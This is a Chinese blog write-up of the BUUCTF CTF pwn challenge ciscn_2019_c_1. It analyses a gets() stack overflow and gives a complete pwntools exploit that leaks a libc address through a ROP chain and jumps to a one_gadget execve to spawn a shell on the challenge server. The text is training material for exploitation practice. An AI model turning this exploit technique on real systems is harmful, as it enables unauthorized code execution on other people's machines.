BUUCTF ciscn_2019_c_1 write up

最新推荐文章于 2024-04-27 09:11:43 发布
最新推荐文章于 2024-04-27 09:11:43 发布
阅读量4.8k 收藏 2
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/100572092
版权

分析:
程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中
在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密
1.如果是小写字母跟0xD异或
2.如果是大写字母跟0xE异或
3.如果是数字跟0xF异或

在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据

二进制文件中没有出现getshell和system之类的函数,所以要通过泄露libc地址来调用system或execve函数

麻烦的是这是64位程序,参数不放在栈上,而是放在寄存器中,所以可以利用loc_400C60 和 loc_400C76 两处的代码布置参数 和调用我们想调用的函数

要注意的是call指令 会进行寻址,所以r12 + rbx*8 不能直接为函数的地址,要设置为指向函数的指针
在这里插入图片描述
具体步骤:
1.先调用puts 泄露puts函数的地址,然后得到libc的基址
2.利用one_gadget工具得到execve的libc地址,再加上libc基址得到execve("/bin/sh“, rsp+0x50, environ)的地址
在这里插入图片描述
3.再次进行溢出用execve的地址覆盖ret的地址从而获得shell
EXP:

from pwn import *
import struct

context(os="linux", arch="amd64", log_level="debug")

debug = 1
d = 0

if debug == 0:
    p = process("./cc_1")
    if d == 1:
        context.terminal = ['tmux', 'splitw', '-h']
        gdb.attach(proc.pidof(p)[0], gdbscript="b main")
else:
    p = remote("pwn.buuoj.cn", 20115)

elf = ELF("./cc_1")
libc = ELF("x64_libc.so.6")

def Encrypt(content):
    p.sendline("1")
    p.recvuntil("Input your Plaintext to be encrypted")
    p.sendline(content)

def Exit():
    p.sendline("3")

start = 0x400790
got_puts = elf.got['puts']
plt_puts = elf.plt['puts']
encrypt = 0x4009A0
loc_c60 = 0x400C60
loc_c7A = 0x400C7A

offset = 0x50

payload = 'a'*(offset + 8) + p64(loc_c7A)
#           rbx,    rbp,    r12,              r13,      r14,   r15
payload += p64(0) + p64(1) + p64(got_puts) + p64(0) + p64(0) + p64(got_puts) + p64(loc_c60)
payload += p64(0) + p64(0)*6 + p64(encrypt)


def exchange(payload):  #对payload进行异或运算
    new_payload = list(payload)
    for i in range(len(payload)):
        c = ord(payload[i])
        if c <= 96 or c > 122:
            if c <=64 or c > 90:
                if c > 47 and c <= 57:
                    c ^=0xf
                    new_payload[i] = chr(c)
                    print "i-> " + str(i)
                else:
                    new_payload[i] = chr(c)
                    print "i-> " + str(i)
            else:
                c ^= 0xe
                new_payload[i] = chr(c)
                print "i-> " + str(i)
        else:
            c ^= 0xd
            new_payload[i] = chr(c)
            print "i-> " + str(i)
    return new_payload

print("payload-> " + str(len(payload)))

payload = ''.join(exchange(payload))
print("payload-> " + payload)

Encrypt(payload)

p.recvline()
p.recvline()
p.recvline()
leak = p.recvuntil('\n')[:-1]
leak += "\x00\x00"    #"Q"只能对8字节数据进行解包,所以进行填充
print("len-> " + str(len(leak)))
print("leak-> " + leak)
leak = struct.unpack("<Q", leak)[0]
print leak
print hex(leak)

binaddr = elf.bss() + 0x100
got_gets = elf.got['gets']
x_addr = 0x6020AC
one_gadget = 0xf02a4
libc_base = leak - libc.symbols['puts']
print("libc_base-> " + hex(libc_base))

execve = libc_base + 0x4526a
print("execve-> " + hex(execve))

payload = 'a'*(offset + 8) + p64(execve)
print("payload-> " + payload)

p.recvuntil("Input your Plaintext to be encrypted")
p.sendline(payload)

p.interactive()

这个EXP有的时候打不到,可能因为有的时候one_gadget的约束条件没有达成

结果:
在这里插入图片描述

苍崎青子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 753
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
ciscn_2019_c_1【BUUCTF
qq_41696518的博客
08-26 1005
ciscn_2019_c_1【BUUCTF
buuctfciscn_2019_c_1
weixin_54452942的博客
04-18 501
通俗易懂
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 578
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
[BUUCTF]ciscn_2019_c_1 1
weixin_55013445的博客
10-01 171
可知,该程序开启了NX(栈不可执行)保护再使用IDA进行反汇编对代码进行分析可知,漏洞点在encrypt()函数的gets()上到此,思路明确,我们可以通过gets()的栈溢出漏洞,获取libc的基地址,接着通过libc的基地址获取system和str_bin_sh的地址,最后执行system(“/bin/sh”)
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1175
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
fk.rar_fk_visual c_write block
09-14
【标题】"fk.rar_fk_visual c_write block" 暗示了这是一个与编程相关的压缩文件,其中包含了使用Visual C++编写的关于“write block”功能的源代码。"Write block"通常指的是在程序中用于控制数据写入的一种技术,...
PICOCTF_2019:picoCTF2019解决方案
02-18
【标签】:“binary-exploitation write-up picoctf-2019 C” 这些标签揭示了压缩包中的主要内容和技术方向。"binary-exploitation"表明了解题过程中涉及了二进制漏洞利用,这是CTF比赛中常见的一类挑战,通常需要...
LCD_YeJing.zip_1_Write On_wave3ak
09-23
Based on the VHDL LCD code, you can download it yourself if you need it. If the file cannot be opened, please write to me!
ply_write.rar_ply_write
09-20
本文将深入探讨如何使用MATLAB编写一个名为`ply_write.m`的函数,以实现PLY3D数据的写入功能。 首先,了解PLY文件的基本结构是至关重要的。PLY文件分为ASCII和二进制两种形式,其中ASCII格式易于阅读和调试,但数据...
GPIO.RAR_GPIO write_gpio read 22
09-21
在压缩包内的文件“gpio.c”很可能是实现这些功能的C语言源代码。代码中可能包含了配置GPIO、写入GPIO22以及读取GPIO22的函数。分析这个源代码,我们可以更深入地理解GPIO操作的具体实现细节,包括如何设置GPIO...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 218
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
BUUCTF-ciscn_2019_c_1(新手pwner的成长日记5)
最新发布
weixin_58410275的博客
04-27 1627
函数的真实地址 = 基地址 + 偏移地址最后,我们来看一下做题思路1.首先寻找一个函数的真实地址(比如这个题目中puts是出现过的函数)构造合理的payload1,劫持程序的执行流程,得到puts函数的真实地址,并重新回到main函数开始的位置。2.找到puts函数的真实地址后,根据其最后三位,可以判断出libc库的版本(这里博主也不是很明白,就不乱讲误人子弟了,这里我采用了挨个试的办法)。3.根据libc库的版本可以很容易的确定puts函数的偏移地址。4.计算基地址。
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 553
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1268
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 247
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
BUUCTF PWN题刷题记录 (未完待续)
qq_41071646的博客
08-01 1980
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不刷。。等有空了再刷 第一题 连上就有flag的pwn 直接 运行就有权限,。 第二题 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
i2c_smbus_write_byte_data
05-04
i2c_smbus_write_byte_data()是Linux下I2C通信的一个函数,用于向I2C设备中指定的寄存器地址写入一个字节的数据。它的函数原型如下: ``` __s32 i2c_smbus_write_byte_data(struct i2c_client *client, __u8 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值